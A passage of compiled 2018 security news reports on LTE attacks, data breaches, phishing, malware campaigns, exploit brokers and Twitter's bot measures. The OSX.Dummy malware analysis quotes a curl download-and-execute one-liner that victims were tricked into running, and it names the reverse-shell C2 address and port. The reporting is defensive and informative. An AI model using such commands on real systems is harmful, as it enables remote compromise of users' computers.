Targeting TOR with their website fingerprinting attack, the researchers revealed that information leaks in the metadata of a connection could be used to distinguish between different websites. They also demonstrated how website fingerprinting can be mapped to LTE layer two attacks.

Although they achieved a high success rate with such an attack, the researchers explain that the experiments were performed on a closed LTE network completely under their control and on a small set of websites.

In addition to these passive attacks, the researchers devised an active attack on LTE’s layer two protocols. Called ALTER, it “exploits the missing integrity protection of LTE user data to perform a chosen-ciphertext attack,” affects all LTE devices and has implications up to the application layer, the research paper reads.

For this attack scenario, the researchers used a malicious relay within the vicinity of the user, which intercepts DNS requests from the mobile device and uses a manipulation mask to change the original IP address to that of the malicious DNS server.

The request is then forwarded to the commercial network, which sends it to the malicious server, and an additional manipulation in the downlink path ensures that the source IP address matches the target, thus rendering the attack undetected.

The attack, however, poses several challenges, such as luring the user into connecting to the malicious relay and maintaining a stable radio connection, and identifying the DNS requests and responses among the transmitted packets. Packet manipulation is another issue an attacker would face.

After testing the ALTER attack in a real-world setup, the researchers determined it is a feasible assault scenario. By forwarding all messages between the user device and the network, the malicious relay remains undetectable. The attack, the researchers claim, is possible despite the LTE Authentication and Key Agreement (AKA) being formally proven secure.

“While lots of research effort in LTE security focuses on the physical and network layers, the data link layer has remained unexplored until now. […] Based on our findings, we urgently demand the implementation of effective countermeasures in the upcoming 5G specification to assure the security and privacy of future mobile communication,” the paper concludes.


Massive Breach at Data Broker Exactis Exposes Millions of Americans
2.7.2018 securityweek  Incindent

Security Researcher Vinny Troia has discovered another sensitive database exposed on the internet. This one uses Elasticsearch, which allows easy data searching over the internet. Elasticsearch offers security including authentication and role-based access control -- but not all customers deploy it.

Troia was interested in Elasticsearch security and used Shodan to find U.S. Elasticsearch databases visible on the internet. According to a report in Wired, he found around 7,000. One stood out -- a database owned by Florida-based data broker firm Exactis and containing personal data on both consumers and businesses.

What makes this discovery exceptional was the sheer size of the database, the sensitivity of the content, and the complete lack of security. Precise details are difficult to ascertain, and Exactis has not been forthcoming with details. However, it appears to contain something like 340 million records (230 million on consumers and 110 million on business contacts); making it a far bigger potential breach than last year's Equifax breach.

The Exactis website claims the firm has consumer data on 218 million individuals and 110 million households. Eight-eight million have email addresses and matching postal addresses, and 112 million include residential phone numbers. Business data includes 21 million companies, 40 million postal addresses, 21 million records with email addresses and matching postal address, and 52 million with business phone numbers.

How much of this was exposed is not known, but it is potentially everything. It doesn't include social security numbers or payment details, but goes into great detail for each individual, including interests, habits and the age and gender of children. It apparently includes more than 400 variables ranging from religion, pets, whether a person smokes, to personal interests.

Troia reported his findings to both Exactis and the FBI; and the database is no longer accessible. However, there is no way of knowing whether anyone other than Troia also located and accessed the data. While Exactis sells this data to businesses to help compile compelling and personalized marketing campaigns, in the hands of cyber criminals the same data could equally be used to compile compelling and personalized phishing campaigns. Any hope that cyber criminals don't use Shodan in the same way and to the same effect as Troia is unfounded.

Robert Capps, VP and Authentication Strategist for NuData Security comments, "If U.S. citizens did not think their personal information has ever been compromised, this should convince them it definitely is. This latest breach blows up the 2018 tab with 230-million records exposed in just one incident."

Chris Olson, CEO of The Media Trust, believes that government must now take a lead. "Data providers need to keep in mind that they are prime targets for cybercriminals who want to commit identity theft and have tools to find databases on publicly accessible servers. While we have yet to find out whether the data they have exposed on a public server has been misappropriated by malicious actors, the scope of and negligence behind this leak could prompt greater demand among already wary U.S. consumers for stronger regulations around data privacy like the EU's GDPR. Such regulations would restrict how personal data is not only stored but used in the U.S."

Carl Wright, chief revenue officer for AttackIQ, holds a similar view. "When a breach such as this occurs, it reinforces the need for government to hold these organizations accountable to the individuals impacted. This will be the only way to ensure that corporations take the necessary steps to secure consumer data. Corporations and government entities must be required to continuously prove that their cyber security protections are able to defeat or detect attackers."

This already happens in Europe with the EU's General Data Protection Regulation (GDPR). It seems to be beginning in the U.S. Yesterday, California Gov. Jerry Brown signed the California Consumer Privacy Act of 2018 (Assembly Bill 375).

"With GDPR now in full effect," comments Richard Henderson, global security strategist at Absolute, "I've been expecting legislation such as this to start to reach consumer-focused states in the US for some time. Other states like New York and Massachusetts will likely follow suit and draft their own citizen-friendly data rights laws. Many individual states will not sit on their hands waiting for a federal initiative that may never come."

The California Act will not come into effect until the beginning of 2020 -- but it will undoubtedly make firms like Exactis re-evaluate what they do, how they do it, and how they secure it. The legislation says, for example, "The bill would require a business to make disclosures about the information and the purposes for which it is used. The bill would grant a consumer the right to request deletion of personal information and would require the business to delete upon receipt of a verified request, as specified."

Meanwhile, 'victims' of the Exactis breach are not waiting for the new law. A proposed class action was lodged in the Florida federal court on Thursday, claiming that Exactis made no attempt to follow best practice guidelines to protect the data. "Despite these well-publicized Senate and other expert reports, defendant failed to heed the recommendations, and inexplicably left its server -- and the personal information which rested thereon -- vulnerable and available to even the most basic cyberattack," claims the suit. It asserts negligence, unjust enrichment claims, and claims under Florida's Deceptive and Unfair Trade Practices Act, and seeks compensatory, punitive, and exemplary damages.

Referring to the California Act, Henderson adds, "I think we are on the threshold of a new period of customer-focused data protections. State and local governments have waited a long time for organizations to take care of this, and based on the colossal number of breaches and rampant digital thefts that continue to occur, they've had enough."


Facebook App Exposed Data of 120 Million Users
2.7.2018 securityweek 
Social

A recently addressed privacy bug on Nametests.com resulted in the data of over 120 million users who took personality quizzes on Facebook to be publicly exposed.

Patched as part of Facebook’s Data Abuse Bounty Program, the vulnerability resided in Nametests.com serving users’ data to any third-party that requested it, something that shouldn’t normally happen.

Facebook launched its Data Abuse Bounty Program in April, as part of its efforts to improve user privacy following the Cambridge Analytica scandal. The company also updated its terms on privacy and data sharing, but also admitted to tracking people over the Internet, even those who are not Facebook users.

The issue in Nametests.com was reported by Inti De Ceukelaire, who discovered that, when loading a personality test, the website would fetch all of his personal information from http://nametests.com/appconfig_user and display it on the page.

Websites shouldn’t normally be allowed to access the information, as web browsers do prevent such behavior. The data requested from Nametests.com, however, was wrapped in JavaScript, meaning that it could be shared with other websites.

“Since NameTests displayed their user’s personal data in JavaScript file, virtually any website could access it when they would request it,” the researcher explains.

To verify that this was indeed happening, he set up a website that connected to Nametests.com and would fetch information about the visitor. The access token provided by Nametests.com could also be used to gain access to the visitor’s posts, photos and friends, depending on the permissions granted.

“It would only take one visit to our website to gain access to someone’s personal information for up to two months,” De Ceukelaire says.

Another issue the researcher discovered was that the user information would continue to be exposed even after they deleted the application. With no log out functionality available, users would have had to manually delete the cookies on their devices to prevent their data from being leaked.

The bug was reported to Facebook’s Data Abuse program on April 22 and a fix was rolled out by June 25, when the researcher noticed that third-parties could no longer access visitors’ personal information as before.

The vulnerability could “have affected Facebook information people shared with nametests.com. To be on the safe side, we revoked the access tokens for everyone on Facebook who has signed up to use this app. So people will need to re-authorize the app in order to continue using it,” Facebook said.

The social platform also donated $8,000 (they apparently doubled the $4,000 bounty because the researcher chose to donate it to charity) to the Freedom of the Press foundation.

“I also got a response from NameTests. The public relations team claims that, according to the data and knowledge they have, they found no evidence of abuse by a third party. They also state that they have implemented additional tests to find such bugs and avoid them in the future,” the researcher notes.


Two Arrested for Hacking 700,000 Accounts
2.7.2018 securityweek  Crime

Russian law enforcement this week said two individuals were arrested for compromising accounts of loyalty program members from popular websites.

The unnamed cybercriminals allegedly compromised around 700,000 accounts from companies such as PayPal, Ulmart, Biglion, KupiKupon, Groupon, and others. They are also said to have put 2,000 of these accounts up for sale for $5 each.

“The detainees admitted on the spot that they had earned at least 500,000 rubles. However, the real amount of damage remains to be determined,” Group-IB, which aided with the investigation, says.

The hackers’ activity stirred interest in November 2015, after the website of a large online store fell to a large-scale cyber-attack in which the personal accounts of the store’s loyalty program members were compromised. Miscreants compromised around 120,000 accounts within a month.

The investigators discovered that the attackers “had collected compromised account information from various Internet services on hacker forums and used special programs to automatically guess passwords of accounts on the website of the online store.”

The miscreants relied on people’s habit of reusing the same login/password on multiple websites. If the logins and passwords were used on the targeted websites, the hackers would access those personal accounts.

The cybercriminals would check the accumulated bonuses on each account and would sell them on hacker forums at $5 per account or 20-30% of the nominal balance of the accounts. The buyers could then abuse the accounts to pay for products with the bonuses.

The hackers, Group-IB says, weren’t only selling compromised accounts, but also offered services for hijacking accounts: they would change the phone number and e-mail on the accounts of the online store. Such services were offered at a price of 10% of the bonus balance on the account.

To hide their tracks, the attackers used anonymizers, launched the attacks from different IP addresses, and also changed the digital fingerprint of the browser (User-Agent). Overall, they sent authorization requests from more than 35,000 unique IP addresses.

Large retailers started checking all orders with payment bonuses in early 2016, which determined the hackers to target lesser-known online stores.

“In addition, the hackers began to work on tips—information about new online stores with bonus programs and coupon services where it was possible to access personal accounts, for which the attackers promised to pay up to 50% of the amount received from the further sale of the compromised accounts,” Group-IB reports.

The leader in these attacks was a resident of Ryazan Region, born in 1998. His partner, born in 1997, who provided technical support for their joint online store, resided in Astrakhan Region.

During a search, investigators seized evidence of the group’s unlawful activities, along with narcotics. The suspects have confessed to the crimes but the investigation is still ongoing.


Typeform Data Breach Hits Many Organizations
2.7.2018 securityweek  Incindent

Typeform, a Spain-based software-as-a-service (SaaS) company that specializes in online forms and surveys, has suffered a security breach that resulted in the data collected by its customers getting stolen.

According to a notice posted on its website, Typeform identified the breach on June 27 and addressed its cause roughly half an hour later. The company says an attacker has managed to download a backup file dated May 3 from one of its servers.

The compromised file stored names, email addresses and other pieces of information submitted by users through Typeform forms. Data collected after May 3, payment information, and passwords are not impacted, Typeform said.

UK-based mobile banking service Monzo is one of the impacted organizations. Monzo says the breach affects roughly 20,000 individuals, a vast majority of which only had their email address exposed. However, in some cases, information such as postcode, name of the old bank, Twitter username, university, city, age and salary range, and employer was also compromised. Monzo says it has ended its relationship with Typeform following the incident.

The Tasmanian Electoral Commission was also hit by this breach. The organization notes that while some of the stolen data is already public, the attacker may have also obtained names, addresses, email addresses, and dates of birth submitted by electors when applying for an express vote at recent elections.

The list of organizations that has notified customers of the Typeform breach also includes Thriva, Birdseye, HackUPC, and Ocean Protocol.

Typeform last year claimed to have 30,000 paying customers and many more using its free service. Companies such as Apple, Uber, Facebook, Adobe, Airbnb, WeTransfer and BBC are also said to have used its services at some point. The company’s website currently lists Trello, HubSpot, Indiegogo, Forbes, and Freshdesk as customers.

Typeform has assured customers that it has identified and addressed the source of the breach. The company claims it has initiated a comprehensive review of its system security and is taking “significant measures” to prevent such incidents from occurring in the future.

However, shortly after the data breach was disclosed, one Twitter user claimed to have identified another vulnerability in Typeform systems.


Vulnerabilities Patched in VMware ESXi, Workstation, Fusion
2.7.2018 securityweek 
Vulnerebility

VMware informed customers last week that it patched several vulnerabilities that can lead to a denial-of-service (DoS) condition or information disclosure in its ESXi, Workstation, and Fusion products.

VMware described the flaws as out-of-bounds read issues in the shader translator component. An attacker with regular user privileges can exploit the security holes to obtain information or crash virtual machines.

The vulnerabilities, classified as “important,” are tracked as CVE-2018-6965, CVE-2018-6966 and CVE-2018-6967. A Tencent ZhanluLab researcher who uses the online moniker “RanchoIce” has been credited for reporting the flaws to VMware. A researcher from Cisco Talos independently discovered CVE-2018-6965.

According to VMware, the flaws impact ESXi 6.7 and Workstation 14.x running on any platform, and Fusion 10.x running on OS X. Patches and updates have been released for each of the affected products.

Cisco Talos has published an advisory containing technical details for CVE-2018-6965. The company has assigned a CVSS score of 6.5 to this vulnerability, which puts it near the “high severity” range.

“A specially crafted pixel shader can cause a read access violation resulting in, at least, denial of service. An attacker can provide a specially crafted shader file (either in binary or text form) to trigger this vulnerability. This vulnerability can be triggered from VMware guest and VMware host, which will be affected (leading to vmware-vmx.exe process crash on host),” Talos wrote in its advisory.

“In short, it is possible to create a shader in such a way that it will cause invalid pointer calculation. The pointer is later used for read memory operations. This causes access violation due to the pointer being invalid, which results in a denial of service, but could potentially be turned into an information disclosure vulnerability,” Talos added.


Trezor users targeted by phishing attacks, experts blame DNS Poisoning or BGP Hijacking
2.7.2018 securityaffairs
Phishing

The maintainers of the Trezor multi-cryptocurrency wallet service reported a phishing attack against some of its users that occurred during the weekend.

TREZOR

@TREZOR
· 1 Jul
Replying to @TREZOR
More details will be published soon in the form of a blog post.

Carsten
@Carsten71071425
I had some issues yesterday, when accessing your site. It seems to be related with DNS. Is http://beta-wallet.trezor.io legit?

1:13 PM - Jul 1, 2018
1
See Carsten's other Tweets
Twitter Ads info and privacy
The attack appears more complex respect a simple phishing campaign, hackers may have powered a DNS poisoning attack or a BGP hijacking to redirect users to a rogue phishing site that mimic the legitimate one.

“DNS poisoning or BGP hijacking point toward DNS poisoning or BGP hijacking” explains the Trezor team.

Hackers redirected legitimate traffic for the official wallet.trezor.io domain to a rogue copy of the website.

The team launched an investigation to shed the light on the attack. The experts spotted the incident after users reported HTTPS certificate error while landing on web wallet portal.

The error alerted the users, this kind of error suggests users are visiting a rogue website that attempts to pose as a legitimate one.

The users quickly reported the anomaly to the team of maintainers that confirmed the phishing attack and published a security advisory to warn users about the phishing attacks.

“Late night yesterday, our Support Team started receiving inquiries about an invalid SSL certificate, which serves as a stamp of authenticity of our web services. This can happen for a few reasons, some of which are less serious. Unfortunately, after investigating these reports closer, we found out that the invalid certificate warning appeared because of phishing attempts against Trezor users.” reads the security advisory.

“The fake Trezor Wallet website was served to some users who attempted to access wallet.trezor.io — the legitimate address. We do not yet know which attack vector was used, but the signs point toward DNS poisoning or BGP hijacking.”

The company also reported two other issues for the bogus website:

The first issue was an error message that was different from the original Trezor site, which told users that syncing data their Trezor hardware wallet and their Trezor web account had failed.
Trezor error message

The second issue was that the fake website was asking users to provide a copy of their “recovery seed,” Trezor warns that users should never enter the recovery seed on a PC or app. If the attackers obtain the recovery seed they can take over the accounts.
The company took down the malicious website with the support of the hosting provider.

slush
@slushcz
"At this moment, the fake Wallet has been taken down by the hosting provider. However, you should remain vigilant and report all suspicious sites. It is possible that this attack method will be used repeatedly in the future."https://blog.trezor.io/psa-phishing-alert-fake-trezor-wallet-website-3bcfdfc3eced …

5:43 PM - Jul 1, 2018

[PSA] Phishing Alert: Fake Trezor Wallet website – TREZOR Blog
Late night yesterday, our Support Team started receiving inquiries about an invalid SSL certificate, which serves as a stamp of…

blog.trezor.io
101
75 people are talking about this
Twitter Ads info and privacy
At the time it is not clear if the attackers stole user funds.

Let’s close with suggestions provided by the company:

So how should I recognize the original Trezor Wallet?
Look for the “Secure” sign in your browser’s address bar. If the certificate is invalid, your browser will warn you, and you should heed the warning. (Make sure you are accessing the correct URL: wallet.trezor.io)
Always verify all operations on your Trezor device. You should only trust the device display and what is written on it. For other sources of information, always maintain a healthy amount of skepticism.
Thirdly, never divulge sensitive or private data to anyone. This includes us at SatoshiLabs. We will never ask you for your recovery seed. Wallet will never ask you for your recovery seed. Only your device may, but it will do so securely.


A sample of CryptoCurrency Clipboard Hijackers monitors 2.3 Million Bitcoin addresses
2.7.2018 securityaffairs Cryptocurrency

A sample of CryptoCurrency Clipboard Hijackers discovered this week by BleepingComputer monitors for more than 2.3 million addresses.
Almost any people that have to send cryptocurrency coins use to copy the recipient wallet address into memory from one application and use it to make the transaction.

Crooks’ interest in cryptocurrency continues to grow and new malware was specifically designed to recognize wallet addresses in the memory of infected computers and use it for fraudulent activities, such as the hijacking of transactions.

This family of malware is called CryptoCurrency Clipboard Hijackers, the malware monitors the Windows clipboard for cryptocurrency addresses, and if one is detected, it then replaces the address in the clipboard with the attacker’s one.

With this simple trick when the user pastes the address he will send the coins to the attacker.

In March, researchers at Palo Alto Networks discovered a malware dubbed ComboJack that is able of detecting when users copy a cryptocurrency address and alter clipboards to steal cryptocurrencies and payments. In June experts from Qihoo 360 Total Security spotted a new malware campaign spreading a clipboard hijacker, tracked as ClipboardWalletHijacker, that infected over 300,000 computers, most of the victims are located in Asia, mainly China.
What is the peculiarity of a sample of cryptocurrency clipboard hijackers recently discovered by researchers at Bleeping Computer?

While most of the previous samples monitored for 400-600 thousand cryptocurrency addresses, the sample discovered this week by BleepingComputer monitors for more than 2.3 million cryptocurrency addresses.

CryptoCurrency Clipboard Hijackers

The following video shows how CryptoCurrency Clipboard Hijackers replace cryptocurrency addresses found within the Windows clipboard.

The only way to prevent such kind of attacks is double-checking the pasted address.

The infection was associated with the recent campaign that targeted Windows computers with so-called All-Radio 4.27 Portable malware package.

CryptoCurrency Clipboard Hijackers infection

“If your computer is suddenly displaying the above program, then your computer is infected with malware that installs rootkits, miners, information-stealing Trojans, and a program that is using your computer to send out spam.” reads a post published by BleepingComputer.

Once the malicious code is installed, a DLL named d3dx11_31.dll will be downloaded to the Windows Temp folder and an autorun called “DirectX 11” will be created to run the library everytime a user logs into the computer.

“This DLL will be executed using rundll32.exe with the “rundll32 C:\Users\[user-name]\AppData\Local\Temp\d3dx11_31.dll,includes_func_runnded” command.”

As usual, let me suggest using an up to date antivirus solution to detect and neutralize these threats.


RIG Exploit Kit operators leverage PROPagate Injection Technique to deliver Miner
2.7.2018 securityaffairs
Exploit

FireEye reported the PROPagate code injection technique that was observed for the first time in a malware distribution campaign in the wild.
Security experts from FireEye have documented the PROPagate code injection technique that was observed for the first time in a malware distribution campaign in the wild.

The PROPagate code injection technique was first discovered in November 2017 by a Hexacorn security researcher that demonstrated it works on all recent Windows versions and could allow attackers to inject malicious code into other applications.

The expert discovered that it is possible to abuse legitimate GUI window properties (UxSubclassInfo and CC32SubclassInfo) utilized internally by SetWindowSubclass function to load and execute malicious code inside other applications.

Back then, a security researcher found that an attacker could abuse the SetWindowSubclass API, a function of the Windows operating system that manages GUIs, to load and execute malicious code inside the processes of legitimate apps.

Malware authors took several months to adopt the PROPagate code injection technique in a live malware campaign.

Recently the experts at FireEye uncovered a campaign leveraging RIG Exploit Kit delivering Monero miner via the PROPagate code injection technique.

The operators of the RIG exploit kit are hijacking traffic from legitimate sites using a hidden iframe and redirects them to a page hosting the exploit kit. The RIG exploit kit uses three JavaScripts snippets, each of which uses a different technique to deliver the malicious payload. Thre three techniques spread the malware:

via malicious JavaScript;
via Flash;
via Visual Basic script;
Below the attack chain described by FireEye:

“The attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe.” reads the analysis published by FireEye.

“This shellcode executes the next payload, which downloads and executes the Monero miner. “

PROPagate injection technique

The analysis of the payload allowed the experts to determine that threat actors have used multiple payloads and anti-analysis techniques to bypass the analysis environment.

PROPagate code injection

“Although we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether.” In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.” concluded FireEye.


Zerodium offers up to $500,000 for Linux Zero-Day exploits
1.7.2018 securityaffairs
Exploit

The sale of Zero-day exploits is a prolific business, zero-day broker Zerodium offers rewards of up to $500,000 FreeBSD, OpenBSD, NetBSD, Linux Zero-Days.
The sale of Zero-day exploits is a prolific business that most people totally ignore, to better understand its evolution let’s analyze together the offer of the popular exploit broker Zerodium. To have a clear idea about the company mission let’s visit the website.

“ZERODIUM pays premium bounties and rewards to security researchers to acquire their original and previously unreported zero-day research affecting major operating systems, software, and devices.” reads the company web sites. “While the majority of existing bug bounty programs accept almost any kind of vulnerabilities and PoCs but pay very low rewards, at ZERODIUM we focus on high-risk vulnerabilities with fully functional exploits, and we pay the highest rewards on the market.”

Zerodium, like other zero-day brokers, buys zero-days and sell them to government agencies and law enforcement, but many privacy advocates fear that these flaws could be used by surveillance firms that sell their products to authoritarian regimes.

The company is offering rewards of up to $500,000 for zero-day exploits in UNIX-based operating systems, including OpenBSD, FreeBSD, NetBSD. The same offer is for exploits developed form popular Linux distros such as Ubuntu, CentOS, Debian, and Tails.

Prices for zero-day vary for several factors, including the market shares of the affected platforms/systems (Windows zero-day exploits for Windows are usually more valuable than Linux ones) and level of user interaction requested for the exploitation of the flaws (no click, one click, two clicks, etc.).

Other factors include the reliability for the zero-day exploit, the number of vulnerabilities that attackers need to chain to exploit the flaw, the success rate, and the OS configuration that it is necessary for the exploitation.

The rewards for Linux zero-days continues to increase, a trend already observed since February, when rewards going as high as $45,000.
zerodium Zero-day exploits

Zerodium

@Zerodium
We're currently acquiring #0day exploits (privilege escalation or RCE) for the following operating systems: OpenBSD, FreeBSD, NetBSD, Ubuntu, CentOS, Debian, and Tails. For related inquiries or submissions, contact us: https://zerodium.com/submit.html

6:17 PM - Jun 27, 2018
51
39 people are talking about this
Twitter Ads info and privacy
The company shared the latest zero-day acquisition drive as part of its ordinary zero-day acquisition program.

The acquisition drive includes special offers, usually associated with higher fees, for specific zero-day exploits.

Zerodium is still looking for remote code execution or local privilege escalation Linux and BSD systems, it offers variable rewards that can go up to $500,000.

The firm payouts for Linux privilege escalation zero-day exploits range from $10,000 to $30,000, while a local privilege escalation (LPE) in Linux could be paid up to $100,000.

Rewards for Linux remote code execution exploits can range from $50,000 to $500,000, zero-days for CentOS and Ubuntu are most wanted.

Across the months, Zerodium published several drive searching for zero-day exploits targeting iOS, Adobe Flash Player, the Tor Browser, mobile IM apps, and Android.

zerodium Zero-day exploits

In the past Zerodium offered up to $1.5 million for an iOS zero-day exploit.

Looking at the price-list for zero-days we can notice that exploit codes for server environments, Linux have high rewards, but mobile exploits remain the most expensive in the zero-day market.

Recently a new player emerged in the zero-day market, it is Crowdfense who launched an acquisition program with prizes of $10 million.


Security issues in the LTE standard expose billions on mobile users to attacks
1.7.2018 securityaffairs Attack

Security issues in the LTE mobile device standard could be exploited by persistent attackers to spy on users’ cellular networks and hijack data traffic.
A team of from Ruhr-Universität Bochum and New York University Abu Dhabi has discovered some security issues in the LTE mobile device standard that could be exploited by persistent attackers (i.e. intelligence agencies, well-funded groups) to spy on users’ cellular networks, eavesdrop communications, hijack their data traffic.

LTE mobile telephony standard is currently used by billions of people worldwide, compared to other standards it includes many security improvements.

The experts devised surveillance techniques that allowed them to identify people within a phone tower radio cell, spy on their traffic, and redirect them to rogue websites by tampering with DNS lookups.

The researchers demonstrated three attack scenarios that target the data link layer of Long-Term Evolution networks, also known as LTE or 4G.

“Our security analysis of the mobile communication standard LTE ( Long-Term Evolution, also know as 4G) on the data link layer (so-called layer two) has uncovered three novel attack vectors that enable different attacks against the protocol.” reads the analysis published by the experts.

“On the one hand, we introduce two passive attacks that demonstrate an identity mapping attack and a method to perform website fingerprinting. On the other hand, we present an active cryptographic attack called aLTEr attack that allows an attacker to redirect network connections by performing DNS spoofing due to a specification flaw in the LTE standard.”

This data link layer lies on top of the physical channel, that maintains the wireless transmission of information between the users and the network. Layer two define the way multiple users can access the resources of the network, helps to correct transmission errors, and implement data protection through encryption.

Researchers distinguished between passive and active attack techniques, the former include identification and website snooping techniques, the latter is the webpage redirection attack.

The identification and website snooping techniques could allow attackers to spy on users by listening to what’s going out over the airwaves from phones, whereas the webpage redirection attack could be conducted by an attacker that sets up a malicious cell tower to tamper with transmissions.

The experts dubbed the DNS spoofing attack “aLTEr” and described it with this statement.

“The aLTEr attack exploits the fact that LTE user data is encrypted in counter mode (AES-CTR) but not integrity protected, which allows us to modify the message payload: the encryption algorithm is malleable, and an adversary can modify a ciphertext into another ciphertext which later decrypts to a related plaintext,” reads the research paper published by the experts.

“the adversary sends signals to the network or to the device by using a specific device that is capable of simulating the legitimate network or user device. In our case, the adversary does both and intercepts all transmissions between Bob and the network. Thus, Bob perceives the adversary as his usual network provider and connects to the simulation device. Towards the real network, the adversary acts like she was Bob.”

LTE active attack

The experts conducted the attacks in a controlled environment and highlighted that the requirements are, at the moment, hard to meet in real LTE networks, anyway persistent attackers can replicate them in the wild.

The researchers used a shielding box to stabilize the radio layer and prevent inference during the tests.

The team set up two servers, a DNS server and an HTTP server, to shows how an attacker can hijack connections (see PoC attack video).

The experts published a paper with all the technical details of the aLTEr attack and a video PoC of the attack:

The attack also requires equipment (USRP) that goes for about $4,000 to emulate the behavior of spying boxes such as IMSI catchers or Stingray.

The researchers also described countermeasures to adopt in order to mitigate the attacks. The researchers already shared findings of their study with telco institutions, including the GSM Association (GSMA) and the 3rd Generation Partnership Project (3GPP), and telephone companies.

According to the experts, forthcoming 5G networks may also be vulnerable to these attack techniques because the 5G standard supports authenticated encryption.

“The use of authenticated encryption would prevent the aLTEr attack, which can be achieved through the addition of message authentication codes to user plane packets,” the experts said.

“However, the current 5G specification does not require this security feature as mandatory, but leaves it as an optional configuration parameter.”

The researchers will share full details about their researcher during the 2019 IEEE Symposium on Security and Privacy.


Data Broker Exactis data breach, one of the biggest ever, exposes millions of Americans
1.7.2018 securityaffairs Incindent

Security expert Vinny Troia has found a huge trove of data belonging to millions of Americans that were left unsecured online.
The security researcher Vinny Troia was analyzing the level of security for Elasticsearch installs exposed online when discovered millions of records belonging to Americans that were left unsecured online.

The expert used Shodan to find U.S. Elasticsearch databases exposed on the internet, the query allowed him to discover around 7,000 instances. One of them immediately appeared very interesting, an archive owned by US data broker firm Exactis that was containing personal data on both consumers and businesses.

“Earlier this month, security researcher Vinny Troia discovered that Exactis, a data broker based in Palm Coast, Florida, had exposed a database that contained close to 340 million individual records on a publicly accessible server. The haul comprises close to 2 terabytes of data that appears to include personal information on hundreds of millions of American adults, as well as millions of businesses.” reported Wired.

“While the precise number of individuals included in the data isn’t clear—and the leak doesn’t seem to contain credit card information or Social Security numbers—it does go into minute detail for each individual listed, including phone numbers, home addresses, email addresses, and other highly personal characteristics for every name.”

The archive was containing roughly 340 million records (230 million on consumers and 110 million on business contacts), this is probably the biggest potential breach ever seen.

According to Exactis website, the firm gathered consumer data on 218 million individuals and 110 million households.

The archive contains 88 million records that include email addresses and postal addresses, while 112 million records include residential phone numbers.

Business data includes 21 million records of companies, 40 million postal addresses, 21 million records with email addresses and postal address, and 52 million business phone numbers.

The good news is that the archive did not include credit card information or Social Security numbers.

Exactis data breach

At the time it is not clear how much the archive was exposed, but experts believe it was completely exposed online. The archive includes interests, habits and the age and gender of children, and more than 400 variables ranging from religion, pets, and whether a person smokes.

The knowledge of so detailed profiles could allow attackers to launch effective spear phishing campaigns.

The security expert promptly reported his findings to the FBI and Exactis, the company immediately secured the database.

Customers proposed a class action in the Florida federal court last week claiming that Exactis did not implement best practice guidelines to protect the data.


Recently discovered OSX.Dummy mac malware is targeting the cryptocurrency community
30.6.2018 securityaffairs Apple

The former NSA white hat hacker and malware researcher Patrick Wardle analyzed a new mac malware dubbed OSX.Dummy that targets the cryptocurrency community.
The popular experts decided to analyze the malicious code after the security researcher Remco Verhoef (@remco_verhoef) posted an interesting entry to SANS ‘InfoSec Handlers Diary Blog’ titled “Crypto community target of MacOS malware.”
“Previous days we’ve seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.” wrote Verhoef.

The Wardle intent was to demonstrate that the Objective-See’s tools can generically thwart this new threat even if it was undetected by all the anti-virus software.

OSX.Dummy malware

Verhoef noticed that the attack was originating within crypto related Slack or Discord chats groups by impersonating admins or key people.

The attackers shared small code snippets like the following one resulting in downloading and executing a malicious binary.

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
Wardle noticed that the malicious binary is not signed, this means it would be blocked by GateKeeper, but attackers overwhelmed this limitation by making the victims to download and run the binary directly via terminal commands.

Wardle conducted a dynamic analysis of the malware using a High Sierra virtual machine with various Objective-See tools installed.

The malware first sets script to be owned as root

# procInfo

monitoring for process events...

process start:
pid: 432
path: /usr/bin/sudo
args: (
"/usr/bin/sudo",
"-S",
"-p",
"#node-sudo-passwd#",
chown,
root,
"/tmp/script.sh"
)
then it changes file’s permissions to root by executing the sudo command, but this will require the user to enter the password in the terminal.

The password is saved by the malicious code in the folder /tmp/dumpdummy;

The malware makes a series of operations that allow it to gain persistence through a malicious launch daemon.

The malware sets up the RunAtLoad key to true, this implies that the value of the Program key, /var/root/script.sh, will be automatically executed by the OS whenever the system is rebooted.

The script will attempt to connect to 185[.]243.115.230 on port 1337.
“It then duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the –i flag. In other words, it’s setting up an interactive reverse shell.” explained Wardle.

“If you have a firewall product installed, such as Objective-See’s LuLu, this network activity will be detected”

If the malware successfully connects the C&C server (
185[.]243.115.230:1337
), the attacker will be able to arbitrarily execute commands as root on the target system.

Below the key findings of Wardle analysis on the OSX.Dummy:

the infection method is dumb
the massive size of the binary is dumb
the persistence mechanism is lame (and thus also dumb)
the capabilities are rather limited (and thus rather dumb)
it’s trivial to detect at every step (that dumb)
…and finally, the malware saves the user’s password to
dumpdummy
“To check if you’re infected run KnockKnock as root (since the malware set’s it components to be readable only by root). Look for an unsigned launch item com.startup.plist executing something named ‘script.sh'” Wardle concluded.


Twitter shared details about its strategy for fighting spam and bots
30.6.2018 securityaffairs
Social

Twitter provided some details on new security processes aimed at preventing malicious automation and spam.
The tech giant also shared data on the success obtained with the introduction of the new security measures.
Social media platform are a privileged tool for psyops and malicious campaign, for this reason, Twitter rolled out new features to detect and prevent any abuse.

Threat actors make a large use of bots to spread propaganda and malicious links, and social media platforms are spending significant efforts in threats mitigation.

Twitter claims it challenged in May more than 9.9 million potentially automated accounts used for malicious activity every week. The data shows a significant decrease from 6.4 million in December 2017.
The social media platform said that the security measures allowed to drastically reduce spam reports received from users, from 25,000 daily reports in March to 17,000 in May.
The company is removing 214% more spam accounts compared to 2017. Twitter suspended over 142,000 apps in the first quarter of 2018, most of them were shut down within a week or even within hours after being registered.

Twitter introduced measures to evaluate account metrics in near-real time.

The platform is able to recognize bots activity detecting synchronized operations conducted by multiple accounts.

Twitter announced it will remove follower and engagement counts from accounts flagged as suspicious that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

